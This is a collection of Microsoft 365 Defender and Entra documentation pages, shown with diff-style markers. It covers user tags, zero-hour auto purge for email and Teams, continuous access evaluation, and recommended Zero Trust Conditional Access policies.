- Back on the **Assign members** page, the users and groups that you added are listed by **Name** and **Type**. To remove entries from the list, select :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** next to the entry.
-
- - Select :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Import** to select a text file that contains the email addresses of the users or groups (one entry per line).
-
- When you're finished on the **Assign members** page, select **Next**.
-
-5. On the **Review tag** page, review your settings. You can select **Edit** in each section to modify the settings within the section. Or you can select **Back** or the specific page in the wizard.
-
- When you're finished on the **Review tag** page, select **Submit**.
-
-6. On the **New tag created** page, you can select the links to add a new tag or manage the tag members.
-
- When you're finished on the **New tag created** page, select **Done**.
-
- Back on the **User tags** page, the new tag is listed.
-
-## Use the Microsoft Defender portal to view user tags
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Settings** \> **Email & collaboration** \> **User tags**. Or, to go directly to the **User tags** page, use <https://security.microsoft.com/securitysettings/userTags>.
-
-On the **User tags** page, you can sort the entries by clicking on an available column header. The following columns are available:
--- **Tag**: The name of the user tag.-- **Applied to**: The number of members-- **Last modified**-- **Created on**-
-Use :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to filter the user tags by **Last modified date**.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and a corresponding value to find specific user tag.
-
-Select a user tag by clicking anywhere in the row other than the check box next to the name to open the details flyout for the user tag.
-
-The details flyout of the user tag contains the following information, based on the type of tag:
--- **System tags**: The details flyout for the Priority account tag contains the following information:
- - **Last updated**
- - **Description**
- - A link to <https://security.microsoft.com/securitysettings/priorityAccountProtection> to turn on or turn off [priority account protection](priority-accounts-turn-on-priority-account-protection.md)
- - **Applied to**
-- **Custom tags**: The details flyout for a custom tag contains the same information as the **User tags** page, plus the list of users and groups that the tag applies to.-
-To take action on user tags, see the next section.
-
-## Use the Microsoft Defender portal to take action on user tags
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Settings** \> **Email & collaboration** \> **User tags**. Or, to go directly to the **User tags** page, use <https://security.microsoft.com/securitysettings/userTags>.
-
-2. On the **User tags** page, select the user tag by using either of the following methods:
- - Select the tag from the list by selecting the check box next to the name. The available actions appear on the page.
- - Select the tag from the list by clicking anywhere in the row other than the check box next to the name. The available actions are in the details flyout that opens.
-
-After you select the user tag, the available actions are described in the following subsections.
-
-### Use the Microsoft Defender portal to modify user tags
-
-After you select the user tag, use either of the following methods to modify it:
--- **On the User tags page**: Select the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit** action that appears.-- **In the details flyout of the selected user tag**: Select the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit** action at the top of the flyout.-
-The same wizard and most of the same settings are available as described in the [Use the Microsoft Defender portal to create user tags](#use-the-microsoft-defender-portal-to-create-user-tags) section earlier in this article, with the following exceptions:
--- You can't rename or change the description of the Priority account tag, so the **Define tag** page isn't available for the Priority account tag.-- The **Define tag** page is available for custom tags, but you can't rename the tag; you can only change the description.-
-## Use the Microsoft Defender portal to remove user tags
-
-You can't remove the built-in Priority account tag.
-
-After you select the custom tag, use either of the following methods to remove it:
--- **On the User tags page**: Select the :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** action that appears.-- **In the details flyout of the selected user tag**: Select the :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** action at the top of the flyout.-
-Read the warning in the confirmation dialog that opens, and then select **Yes, remove**.
-
-Back on the **User tags** page, the custom tag is no longer listed.
-
-## User tags in reports and features
-
-After you apply system tags or custom tags to users, you can use those tags as filters in the following features:
--- [Alerts](../defender/investigate-alerts.md)-- [Incidents](mdo-sec-ops-manage-incidents-and-alerts.md)-- [Custom alert policies](/purview/alert-policies#view-alerts)-- [Threat Explorer](threat-explorer-real-time-detections-about.md)-- [Campaign Views](campaigns.md)-- [Email entity page](mdo-email-entity-page.md)-- [Email security reports](reports-email-security.md)
- - [Compromised user report](reports-email-security.md#compromised-users-report)
- - [Submissions report](reports-email-security.md#submissions-report)
- - [Threat protection status report](reports-email-security.md#threat-protection-status-report)
- - [Top senders and recipients report](reports-email-security.md#top-senders-and-recipients-report)
-- [Attack simulation training](attack-simulation-training-get-started.md)
- - [Simulations](attack-simulation-training-simulations.md)
- - [Simulation automations](attack-simulation-training-simulation-automations.md)
- - [Payloads](attack-simulation-training-payloads.md)
- - [Training campaigns](attack-simulation-training-training-campaigns.md)
- - [Training modules](attack-simulation-training-training-modules.md)
-- [Quarantine](quarantine-admin-manage-messages-files.md) Currently, tag selection on the Quarantine filter page supports only the Priority account tag.-- [Admin submissions and user reported messages](submissions-admin.md)-- In organizations above a certain size, the [Email issues for priority accounts report](/exchange/monitoring/mail-flow-reports/mfr-email-issues-for-priority-accounts-report) is available in the Exchange admin center (EAC).-
-For information about where the effects of priority account protection are visible, see [Review differentiated protection from priority account protection](priority-accounts-turn-on-priority-account-protection.md#review-differentiated-protection-from-priority-account-protection).
-
-## More information
--- [Configure and review priority account protection](priority-accounts-turn-on-priority-account-protection.md)-- [Manage and monitor priority accounts](/microsoft-365/admin/setup/priority-accounts)
security Zero Hour Auto Purge https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/zero-hour-auto-purge.md
- Title: Zero-hour auto purge in Microsoft Defender for Office 365
- - NOCSH
----
- - MOE150
- - MED150
- - MBS150
- - MET150
-
- - m365-security
- - tier2
-
- - seo-marvel-apr2020
-description: Zero-hour auto purge (ZAP) moves delivered messages in Microsoft 365 mailboxes to the Junk Email folder or quarantine if those messages are retroactively found to be spam, phishing, or contain malware.
- Previously updated : 11/16/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
--
-# Zero-hour auto purge (ZAP) in Microsoft Defender for Office 365
--
-In Microsoft 365 organizations with Exchange Online mailboxes, zero-hour auto purge (ZAP) is a protection feature in Exchange Online Protection (EOP) that retroactively detects and neutralizes malicious phishing, spam, or malware messages that have already been delivered to Exchange Online mailboxes.
-
-ZAP doesn't work in standalone EOP environments that protect on-premises mailboxes.
-
-> [!NOTE]
-> Currently in Preview, ZAP is also able to retroactively detect existing malicious chat messages in Microsoft Teams.
-
-Spam and malware signatures in the service are updated in real-time on a daily basis. However, users can still receive malicious messages. For example:
--- Zero-day malware that was undetectable during mail flow.-- Content that's weaponized after being delivered to users.-
-ZAP addresses these issues by continually monitoring spam and malware signature updates in the service, and is seamless for users. ZAP finds and takes automated action on messages that are already in a user's mailbox. ZAP's search is limited to the last 48 hours of delivered email. Users aren't notified if ZAP detects and moves a message.
-
-Watch this short video to learn how ZAP in Microsoft Defender for Office 365 automatically detects and neutralizes threats in email.
-
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RWGrLg]
-
-## Zero-hour auto purge (ZAP) for email messages
-
-### Zero-hour auto purge (ZAP) for malware
-
-For _read or unread messages_ that are found to contain malware after delivery, ZAP quarantines the message that contains the malware attachment. By default, only admins can view and manage quarantined malware messages. But, admins can create and use _quarantine policies_ to define what users are able to do to quarantined messages, and whether users receive quarantine notifications. For more information, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy).
-
-> [!NOTE]
-> Users can't release their own messages that were quarantined as malware, regardless of how the quarantine policy is configured. If the policy allows users to release their own quarantined messages, users are instead allowed to _request_ the release of their quarantined malware messages.
-
-ZAP for malware is enabled by default in anti-malware policies. For more information, see [Configure anti-malware policies in EOP](anti-malware-policies-configure.md).
-
-### Zero-hour auto purge (ZAP) for phishing
-
-For _read or unread messages_ that are identified as _phishing_ (not _high confidence phishing_) after delivery, the ZAP outcome depends on the action that's configured for a **Phishing** verdict in the applicable anti-spam policy. The available actions and the possible ZAP outcomes are described in the following list:
--- **Add X-Header**, **Prepend subject line with text**, **Redirect message to email address**, **Delete message**: ZAP takes no action on the message.-- **Move message to Junk Email**: ZAP moves the message to the Junk Email folder.-
- This is the default action for a **Phishing** verdict in the default anti-spam policy and custom anti-spam policies that you create in PowerShell.
--- **Quarantine message**: ZAP quarantines the message.-
- This is the default action for a **Phishing** verdict in the [Standard and Strict preset security policies](preset-security-policies.md#profiles-in-preset-security-policies), and in custom anti-spam policies that you create in the Defender portal.
-
-By default, ZAP for phishing is enabled in anti-spam policies.
-
-For more information about configuring spam filtering verdicts, see [Configure anti-spam policies in Microsoft 365](anti-spam-policies-configure.md).
-
-### Zero-hour auto purge (ZAP) for high confidence phishing
-
-For _read or unread messages_ that are identified as _high confidence phishing_ after delivery, ZAP quarantines the message. By default, only admins can view and manage quarantined high confidence phishing messages. But, admins can create and use _quarantine policies_ to define what users are able to do to quarantined messages, and whether users receive quarantine notifications. For more information, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy).
-
-> [!NOTE]
-> Users can't release their own messages that were quarantined as high confidence phishing, regardless of how the quarantine policy is configured. If the policy allows users to release their own quarantined messages, users are instead allowed to _request_ the release of their quarantined high confidence phishing messages.
-
-ZAP for high confidence phishing is enabled by default. For more information, see [Secure by Default in Office 365](secure-by-default.md).
-
-### Zero-hour auto purge (ZAP) for spam
-
-For _unread messages_ that are identified as _spam_ or _high confidence spam_ after delivery, the ZAP outcome depends on the action that's configured for a **Spam** or **High confidence spam** verdict in the applicable anti-spam policy. The available actions and the possible ZAP outcomes are described in the following list:
--- **Add X-Header**, **Prepend subject line with text**, **Redirect message to email address**, **Delete message**: ZAP takes no action on the message.-- **Move message to Junk Email**: ZAP moves the message to the Junk Email folder.-
- For the **Spam** verdict, this is the default action in the default anti-spam policy, new custom anti-spam policies, and the [Standard preset security policy](preset-security-policies.md#profiles-in-preset-security-policies).
-
- For the **High confidence spam** verdict, this is the default action in the default anti-spam policy and new custom anti-spam policies.
--- **Quarantine message**: ZAP quarantines the message.-
- For the **Spam** verdict, this is the default action in the [Strict preset security policy](preset-security-policies.md#profiles-in-preset-security-policies).
-
- For the **High confidence spam** verdict, this is the default action in the [Standard and Strict preset security policies](preset-security-policies.md#profiles-in-preset-security-policies).
-
-By default, users can view and manage messages that were quarantined as spam or high confidence spam where they're a recipient. But, admins can create and use _quarantine policies_ to define what users are able to do to quarantined messages, and whether users receive quarantine notifications. For more information, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy).
-
-By default, ZAP for spam is enabled in anti-spam policies.
-
-For more information about configuring spam filtering verdicts, see [Configure anti-spam policies in Microsoft 365](anti-spam-policies-configure.md).
-
-### How to see if ZAP moved your message
-
-To determine if ZAP moved your message, you have the following options:
--- **Number of messages**: Use the [Mailflow view in the Mailflow status report](reports-email-security.md#mailflow-view-for-the-mailflow-status-report) to see the number of ZAP-affected messages for the specified date range.-- **Message details**: Use [Threat Explorer (or real-time detections)](threat-explorer-real-time-detections-about.md) to filter **All email** events by the value **ZAP** for the **Additional action** column.-
-> [!NOTE]
-> ZAP is not logged in the Exchange mailbox audit logs as a system action.
-
-### Zero-hour auto purge (ZAP) considerations for Safe Attachments in Microsoft Defender for Office 365
-
-ZAP doesn't quarantine messages that are in the process of [Dynamic Delivery](safe-attachments-about.md#dynamic-delivery-in-safe-attachments-policies) in Safe Attachments policy scanning. If a phishing or spam signal is received for messages in this state, and the filtering verdict in the anti-spam policy is set to take some action on the message (Move to Junk, Redirect, Delete, or Quarantine), ZAP reverts to the 'Move to Junk' action.
-
-## Zero-hour auto purge (ZAP) in Microsoft Teams
-
-> [!TIP]
-> ZAP for Microsoft Teams is available only to customers with Microsoft 365 E5 or Microsoft Defender for Office 365 Plan 2 subscriptions. To configure ZAP for Teams protection, see [Microsoft Defender for Office 365 Plan 2 support for Microsoft Teams](mdo-support-teams-about.md).
-
-### ZAP in Teams chats
-
-ZAP is available for internal messages in Teams chats that are identified as malware or high confidence phishing. Currently, external messages aren't supported.
-
-Teams is different than email, because everyone in a Teams chat receives the same copy of the message at the same time (there's no message bifurcation). When ZAP for Teams protection blocks a message, the message is blocked for everyone in the chat. The initial block happens right after delivery, but ZAP occurs up to 48 hours after delivery.
-
-Exclusions for ZAP for Teams protection in Teams chats matter for message _recipients_, not message _senders_. To configure exceptions for Teams chats, see [Configure ZAP for Teams protection in Defender for Office 365 Plan 2](mdo-support-teams-about.md#configure-zap-for-teams-protection-in-defender-for-office-365-plan-2).
-
-ZAP for Teams protection is able to take action on messages for _all_ recipients in a chat if _any_ recipients in the chat aren't excluded from ZAP for Teams protection. Only when _all_ recipients in a chat are excluded from ZAP for Teams protection will ZAP not take action on a message. These scenarios are illustrated in the following table:
-
-|Scenario|Result|
-|||
-|Group chat with Recipients A, B, C, and D. <br/><br/> Recipients A, B, C, and D are excluded from ZAP for Teams protection.|ZAP won't block messages sent to the group chat.|
-|Group chat with Recipients A, B, C, and D. <br/><br/> Only recipients A, B, and C are excluded from ZAP for Teams protection.|ZAP is able to block messages sent to the group chat for all recipients.|
-|Group chat with Recipients A, B, C, and D. <br/><br/> Recipients A, B, C, and D aren't excluded from ZAP for Teams protection. <br/><br/> Sender X is excluded from ZAP for Teams protection and sends a message to the group chat.|ZAP is able to block messages sent to the group chat for all recipients.|
-
-**Sender view**:
--
-**Recipient view**:
--
-### ZAP in Teams channels
-
-ZAP for Teams protection supports the following types of Teams channels:
--- **Standard channels**: ZAP is available for internal messages. Currently, external messages aren't supported.-- **Shared channels**: ZAP is available for internal and external messages.-
-Currently, ZAP isn't available in private channels.
-
-To configure exceptions for ZAP protection for Teams channels, you need the recipient email address. This address is different than the channel email address in the Teams client.
-
-To get the recipient email address to use for exceptions for Teams channel protection, use the **Name and email** value from the **Channel details** section of the Teams message entity panel. For more information, see [The Teams message entity panel in Microsoft Defender for Office 365](teams-message-entity-panel.md).
--
-To configure exceptions for Teams channels, see [Configure ZAP for Teams protection in Defender for Office 365 Plan 2](mdo-support-teams-about.md#configure-zap-for-teams-protection-in-defender-for-office-365-plan-2).
-
-### Zero-hour auto purge (ZAP) for high confidence phishing messages in Teams
-
-For messages that are identified as high confidence phishing after delivery, ZAP for Teams protection blocks and quarantines the message. To set the quarantine policy that's used for high confidence phishing detections in ZAP for Teams, see [Microsoft Defender for Office 365 Plan 2 support for Microsoft Teams](mdo-support-teams-about.md).
-
-### Zero-hour auto purge (ZAP) for malware in Teams messages
-
-For messages that are identified as malware, ZAP for Teams protection blocks and quarantines the message. To set the quarantine policy that's used for malware detections in ZAP for Teams, see [Microsoft Defender for Office 365 Plan 2 support for Microsoft Teams](mdo-support-teams-about.md).
-
-### How to see if ZAP blocked a Teams message
-
-Currently, only admins can view and manage messages that were quarantined by ZAP for Teams protection. For more information, see [Use the Microsoft Defender portal to manage Microsoft Teams quarantined messages](quarantine-admin-manage-messages-files.md#use-the-microsoft-defender-portal-to-manage-microsoft-teams-quarantined-messages).
-
-## Zero-hour auto purge (ZAP) FAQ
-
-### What happens if ZAP moves legitimate messages to the Junk Email folder?
-
-Follow the normal process for [reporting false positives to Microsoft](submissions-report-messages-files-to-microsoft.md). ZAP moves the message from the Inbox folder to the Junk Email folder only if the service determines that the message is spam or malicious.
-
-### What if I use the Quarantine folder instead of the Junk Mail folder?
-
-ZAP takes action on a message based on the configuration of anti-spam policies as described earlier in this article.
-
-### How is ZAP affected by the exceptions to protection features in EOP and Defender for Office 365?
-
-ZAP actions might be overridden by [Safe sender lists](create-safe-sender-lists-in-office-365.md), Exchange mail flow rules (transport rules), and other organizational block and allow settings. However, for malware and high confidence phishing verdicts, there are very few scenarios where ZAP doesn't act on messages to protect users:
--- [Third-party phishing simulation URLs identified in the Advanced delivery policy](advanced-delivery-policy-configure.md#use-the-microsoft-defender-portal-to-configure-third-party-phishing-simulations-in-the-advanced-delivery-policy) (high confidence phishing).-- [SecOps mailboxes identified in the Advanced delivery policy](advanced-delivery-policy-configure.md#use-the-microsoft-defender-portal-to-configure-secops-mailboxes-in-the-advanced-delivery-policy) (malware and high confidence phishing).-- The MX record for your Microsoft 365 domain points to another service or device, and you use a mail flow rule to [bypass spam filtering](/exchange/security-and-compliance/mail-flow-rules/use-rules-to-set-scl) (high confidence phishing).-- [Admin submissions of false positives to Microsoft](submissions-admin.md#report-good-email-to-microsoft). By default, allow entries for domains and email addresses, files, and URLs exist for 30 days (malware and high confidence phishing).-
-It's important for you to carefully consider the implications of bypassing filtering, as it could compromise the security posture of your organizatione.
-
-### What are the licensing requirements for ZAP?
-
-There are no special licensing requirements for ZAP for malware, spam, and phishing. ZAP works on all mailboxes hosted in Exchange Online. ZAP doesn't work in on-premises mailboxes that are protected by standalone EOP.
-
-ZAP for Teams protection requires Microsoft 365 E5 or Microsoft Defender for Office 365 Plan 2 licenses.
-
-### Does ZAP work on messages in other folders in the mailbox (for example, messages moved by Inbox rules)?
-
-ZAP still works as long as the message hasn't been deleted, or as long as the same or stronger action hasn't already been applied. For example, if the message is in the Junk Email folder, and the action in the applicable anti-phishing policy is quarantine, ZAP quarantines the message.
-
-### How does ZAP affect mailboxes on hold?
-
-ZAP quarantines messages from mailboxes on hold. ZAP can move messages to the Junk Email folder based on the action that's configured for a spam or phishing verdict in anti-spam policies.
-
-For more information about holds in Exchange Online, see [In-Place Hold and Litigation Hold in Exchange Online](/Exchange/security-and-compliance/in-place-and-litigation-holds).
security Zero Trust Continuous Access Evaluation Microsoft 365 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/zero-trust-continuous-access-evaluation-microsoft-365.md
- Title: Continuous access evaluation for Microsoft 365 - Microsoft 365 for enterprise
-description: Describes how conditional access evaluation for Microsoft 365 and Microsoft Entra ID proactively terminates active user sessions and enforces tenant policy changes in near real time.
-----
- - NOCSH
-
- - it-pro
- - goldenconfig
-
- - M365-identity-device-management
- - m365-security
- - m365solution-identitydevice
- - m365solution-scenario
- - highpri
- - tier1
Previously updated : 1/31/2023--
-# Continuous access evaluation for Microsoft 365
-
-Modern cloud services that use OAuth 2.0 for authentication traditionally rely on access token expiration to revoke a user account's access. In practice, this means even if an administrator revokes a user account's access, the user will still have access until the access token expires, which for Microsoft 365 by default, used to be up to an hour after the initial revocation event took place.
-
-Continuous access evaluation for Microsoft 365 and Microsoft Entra ID proactively terminates active user sessions and enforces tenant policy changes in near real time instead of relying on access token expiration. Microsoft Entra ID notifies continuous access evaluation-enabled Microsoft 365 services (such as SharePoint, Teams, and Exchange) when the user account or tenant has changed in a way that requires reevaluation of the user account's authentication state.
-
-When a continuous access evaluation-enabled client such as Outlook tries to access Exchange with an existing access token, the token is rejected by the service, prompting a new Microsoft Entra authentication. The result is near real time enforcement of user account and policy changes.
-
-Here are some additional benefits:
--- For a malicious insider who copies and exports a valid access token outside of your organization, continuous access evaluation prevents usage of this token through Microsoft Entra IP address location policy. With continuous access evaluation, Microsoft Entra ID synchronizes policies down to supported Microsoft 365 services so when an access token attempts to access the service from outside of the IP address range in the policy, the service rejects the token.--- Continuous access evaluation improves resiliency by requiring less token refreshes. Because supporting services receive proactive notifications about requiring reauthentication, Microsoft Entra ID can issue longer-lived tokens, for example, beyond one hour. With longer-lived tokens, clients don't have to request a token refresh from Microsoft Entra ID as often, so the user experience is more resilient.-
-Here are some examples of situations where continuous access evaluation improves user access control security:
--- A user account's password has been compromised so an administrator invalidates all existing sessions and resets their password from the Microsoft 365 admin center. In near real time, all existing user sessions with Microsoft 365 services are invalidated.--- A user working on a document in Word takes their tablet to a public coffee shop that is not in an administrator-defined and approved IP address range. At the coffee shop, the user's access to the document is blocked immediately.-
-For Microsoft 365, continuous access evaluation is currently supported by the:
--- Exchange, SharePoint, and Teams services.-- Outlook, Teams, Office, and OneDrive in a web browser and for the Win32, iOS, Android, and Mac clients.-
-Microsoft is working on additional Microsoft 365 services and clients to support continuous access evaluation.
-
-Continuous access evaluation will be included in all versions of Office 365 and Microsoft 365. Configuring Conditional Access policies requires Microsoft Entra ID P1, which is included in all Microsoft 365 versions.
-
-> [!NOTE]
-> See [this article](/entra/identity/conditional-access/concept-continuous-access-evaluation#limitations) for the limitations of continuous access evaluation.
-
-## Scenarios supported by Microsoft 365
-
-Continuous access evaluation supports two types of events:
--- Critical events are those in which a user should lose access.-- Conditional Access policy evaluation occurs when a user should lose access to a resource based on an administrator-defined policy.-
-Critical events include:
--- User account is disabled-- Password is changed-- User sessions are revoked-- Multifactor authentication is enabled for the user-- Account risk increased based on the evaluation of the access from [Microsoft Entra ID Protection](/entra/id-protection/overview-identity-protection)-
-Conditional Access policy evaluation occurs when the user account is no longer connecting from a trusted network.
-
-The following Microsoft 365 services currently support continuous access evaluation by listening to events from Microsoft Entra ID.
-
-|Enforcement type|Exchange|SharePoint|Teams|
-|||||
-|**Critical events:**||||
-|User revocation|Supported|Supported|Supported|
-|User risk|Supported|Not supported|Supported|
-|**Conditional Access policy evaluation:**||||
-|IP address location policy|Supported|Supported\*|Supported\**|
-
-\* SharePoint Office web browser access supports instant IP policy enforcement by enabling strict mode. Without strict mode, access token lifetime is one hour.
-
-\** Calls, meetings, and chat in Teams do not conform to IP-based Conditional Access policies.
-
-For more information about how to set up a Conditional Access policy, see [this article](/entra/identity/conditional-access/overview).
-
-## Microsoft 365 clients supporting continuous access evaluation
-
-Continuous access evaluation-enabled clients for Microsoft 365 support a claim challenge, which is a redirect of a user session to Microsoft Entra ID for reauthentication, when a cached user token is rejected by a continuous access evaluation-enabled Microsoft 365 service.
-
-The following clients support continuous access evaluation on web, Win32, iOS, Android, and Mac:
--- Outlook-- Teams-- Office\*-- SharePoint-- OneDrive-
-\* Claim challenge is not supported on Office for web.
-
-For clients that don't support continuous access evaluation, the access token lifetime to Microsoft 365 remains as one hour by default.
-
-## See also
--- [Continuous access evaluation](/entra/identity/conditional-access/concept-continuous-access-evaluation)-- [Conditional Access documentation](/entra/identity/conditional-access/overview)-- [Microsoft Entra ID Protection documentation](/entra/id-protection/overview-identity-protection)
security Zero Trust Identity Device Access Policies Common https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/zero-trust-identity-device-access-policies-common.md
- Title: Common Zero Trust identity and device access policies - Microsoft 365 for enterprise
-description: Describes the recommended common Zero Trust identity and device access policies and configurations.
-----
- - NOCSH
--
- - it-pro
- - goldenconfig
-
- - M365-identity-device-management
- - m365-security
- - remotework
- - m365solution-identitydevice
- - m365solution-scenario
- - zerotrust-solution
- - tier2
Previously updated : 1/31/2023--
-# Common security policies for Microsoft 365 organizations
-
-Organizations have lots to worry about when deploying Microsoft 365 for their organization. The Conditional Access, app protection, and device compliance policies referenced in this article are based on Microsoft's recommendations and the three guiding principles of [Zero Trust](/security/zero-trust/zero-trust-overview):
--- Verify explicitly-- Use least privilege-- Assume breach-
-Organizations can take these policies as is or customize them to fit their needs. If possible, test your policies in a non-production environment before rolling out to your production users. Testing is critical to identify and communicate any possible effects to your users.
-
-We group these policies into three protection levels based on where you are on your deployment journey:
--- **Starting point** - Basic controls that introduce multifactor authentication, secure password changes, and app protection policies.-- **Enterprise** - Enhanced controls that introduce device compliance.-- **Specialized security** - Policies that require multifactor authentication every time for specific data sets or users.-
-The following diagram shows which level of protections each policy applies to and whether the policies apply to PCs or phones and tablets, or both categories of devices.
--
-You can download this diagram as a [PDF](https://download.microsoft.com/download/e/d/0/ed03381c-16ce-453e-9c89-c13967819cea/zero-trust-identity-and-device-access-policies.pdf) file.
-
-<!--
-
-Here's a one-page PDF summary:
-
-[![Thumb image for the Zero Trust identity and device protection for Microsoft 365 handout.](../../media/microsoft-365-policies-configurations/zero-trust-id-device-protection-model-handout-thumbnail.png)](../../downloads/MSFT-cloud-architecture-identity-device-protection-handout.pdf) <br> [View as a PDF](../../downloads/MSFT-cloud-architecture-identity-device-protection-handout.pdf) \| [Download as a PDF](https://github.com/MicrosoftDocs/microsoft-365-docs/raw/public/microsoft-365/downloads/MSFT-cloud-architecture-identity-device-protection-handout.pdf)
->-
-> [!TIP]
-> Requiring the use of multifactor authentication (MFA) is recommended before enrolling devices in Intune to assure that the device is in the possession of the intended user. You must enroll devices in Intune before you can enforce device compliance policies.
-
-## Prerequisites
-
-### Permissions
--- Users who will manage Conditional Access policies must be able to sign in to the Azure portal as a **Conditional Access Administrator**, **Security Administrator**, or **Global Administrator**.-- Users who will manage app protection and device compliance policies must be able to sign in to Intune as an **Intune Administrator** or **Global Administrator**.-- Those users who only need to view configurations can be assigned the **Security Reader** or **Global Reader** roles.-
-For more information about roles and permissions, see the article [Microsoft Entra built-in roles](/entra/identity/role-based-access-control/permissions-reference).
-
-### User registration
-
-Ensure your users register for multifactor authentication prior to requiring its use. If you have licenses that include Microsoft Entra ID P2, you can use the [MFA registration policy within Microsoft Entra ID Protection](/entra/id-protection/howto-identity-protection-configure-mfa-policy) to require that users register. We provide [communication templates](https://aka.ms/mfatemplates), you can download and customize, to promote registration.
-
-### Groups
-
-All Microsoft Entra groups used as part of these recommendations must be created as a **Microsoft 365** group *not a Security group*. This requirement is important for the deployment of sensitivity labels when securing documents in Microsoft Teams and SharePoint later on. For more information, see the article [Learn about groups and access rights in Microsoft Entra ID](/entra/fundamentals/concept-learn-about-groups#group-types)
-
-### Assigning policies
-
-Conditional Access policies may be assigned to users, groups, and administrator roles. Intune app protection and device compliance policies may be assigned to *groups only*. Before you configure your policies, you should identify who should be included and excluded. Typically, starting point protection level policies apply to everybody in the organization.
-
-Here's an example of group assignment and exclusions for requiring MFA after your users have completed [user registration](#user-registration).
-
-|&nbsp;|Microsoft Entra Conditional Access policy|Include|Exclude|
-|||||
-|**Starting point**|Require multifactor authentication for medium or high sign-in risk|*All users*|<ul><li>Emergency access accounts</li><li>Conditional Access exclusion group</li></ul>|
-|**Enterprise**|Require multifactor authentication for low, medium, or high sign-in risk|*Executive staff group*|<ul><li>Emergency access accounts</li><li>Conditional Access exclusion group</li></ul>|
-|**Specialized security**|Require multifactor authentication always|*Top Secret Project Buckeye group*|<ul><li>Emergency access accounts</li><li>Conditional Access exclusion group</li></ul>|
-
-Be careful when applying higher levels of protection to groups and users. **The goal of security isn't to add unnecessary friction** to the user experience. For example, members of the *Top Secret Project Buckeye group* will be required to use MFA every time they sign in, even if they aren't working on the specialized security content for their project. Excessive security friction can lead to fatigue.
-
-You may consider enabling [passwordless authentication methods](/entra/identity/authentication/concept-authentication-passwordless), like Windows Hello for Business or FIDO2 security keys to reduce some friction created by certain security controls.
-
-### Emergency access accounts
-
-All organizations should have at least one emergency access account that is monitored for use and excluded from policies. **These accounts are only used in case all other administrator accounts and authentication methods become locked out or otherwise unavailable**. More information can be found in the article, [Manage emergency access accounts in Microsoft Entra ID](/entra/identity/role-based-access-control/security-emergency-access).
-
-### Exclusions
-
-A recommended practice is to create a Microsoft Entra group for Conditional Access exclusions. This group gives you a means to provide access to a user while you troubleshoot access issues.
-
-> [!WARNING]
-> This group is recommended for use as a temporary solution only. Continuously monitor and audit this group for changes and be sure the exclusion group is being used only as intended.
-
-To add this exclusion group to any existing policies:
-
-1. Sign in to the **Azure portal** as a Conditional Access Administrator, Security Administrator, or Global Administrator.
-1. Browse to **Microsoft Entra ID** > **Security** > **Conditional Access**.
-1. Select an existing policy.
-1. Under **Assignments**, select **Users or workload identities**.
- 1. Under **Exclude**, select **Users and groups** and choose your organization's emergency access or break-glass accounts and Conditional Access exclusion group.
-
-## Deployment
-
-We recommend implementing the [starting point policies](#starting-point) in the order listed in this table. However, the MFA policies for [enterprise](#enterprise) and [specialized security](#specialized-security) levels of protection can be implemented at any time.
-
-### Starting point
-
-|Policy|More information|Licensing|
-||||
-|[Require MFA when sign-in risk is *medium* or *high*](#require-mfa-based-on-sign-in-risk)|Use risk data from Microsoft Entra ID Protection to require MFA only when risk is detected|Microsoft 365 E5 or Microsoft 365 E3 with the E5 Security add-on|
-|[Block clients that don't support modern authentication](#block-clients-that-dont-support-multifactor-authentication)|Clients that don't use modern authentication can bypass Conditional Access policies, so it's important to block them.|Microsoft 365 E3 or E5|
-|[High risk users must change password](#high-risk-users-must-change-password)|Forces users to change their password when signing in if high-risk activity is detected for their account.|Microsoft 365 E5 or Microsoft 365 E3 with the E5 Security add-on|
-|[Apply application protection policies for data protection](#app-protection-policies)|One Intune app protection policy per platform (Windows, iOS/iPadOS, Android).|Microsoft 365 E3 or E5|
-|[Require approved apps and app protection policies](#require-approved-apps-and-app-protection-policies)|Enforces mobile app protection policies for phones and tablets using iOS, iPadOS, or Android.|Microsoft 365 E3 or E5|
-
-### Enterprise
-
-|Policy|More information|Licensing|
-||||
-|[Require MFA when sign-in risk is *low*, *medium*, or *high*](#require-mfa-based-on-sign-in-risk)|Use risk data from Microsoft Entra ID Protection to require MFA only when risk is detected|Microsoft 365 E5 or Microsoft 365 E3 with the E5 Security add-on|
-|[Define device compliance policies](#device-compliance-policies)|Set minimum configuration requirements. One policy for each platform.|Microsoft 365 E3 or E5|
-|[Require compliant PCs and mobile devices](#require-compliant-pcs-and-mobile-devices)|Enforces the configuration requirements for devices accessing your organization|Microsoft 365 E3 or E5|
-
-### Specialized security
-
-|Policy|More information|Licensing|
-||||
-|[*Always* require MFA](#always-require-mfa)|Users must perform MFA anytime they sign in to your organizations services|Microsoft 365 E3 or E5|
-
-## App protection policies
-
-[App protection policies](/mem/intune/apps/app-protection-policy) define which apps are allowed and the actions they can take with your organization's data. There are many choices available and it may be confusing to some. The following baselines are Microsoft's recommended configurations that may be tailored to your needs. We provide three templates to follow, but think most organizations will choose levels 2 and 3.
-
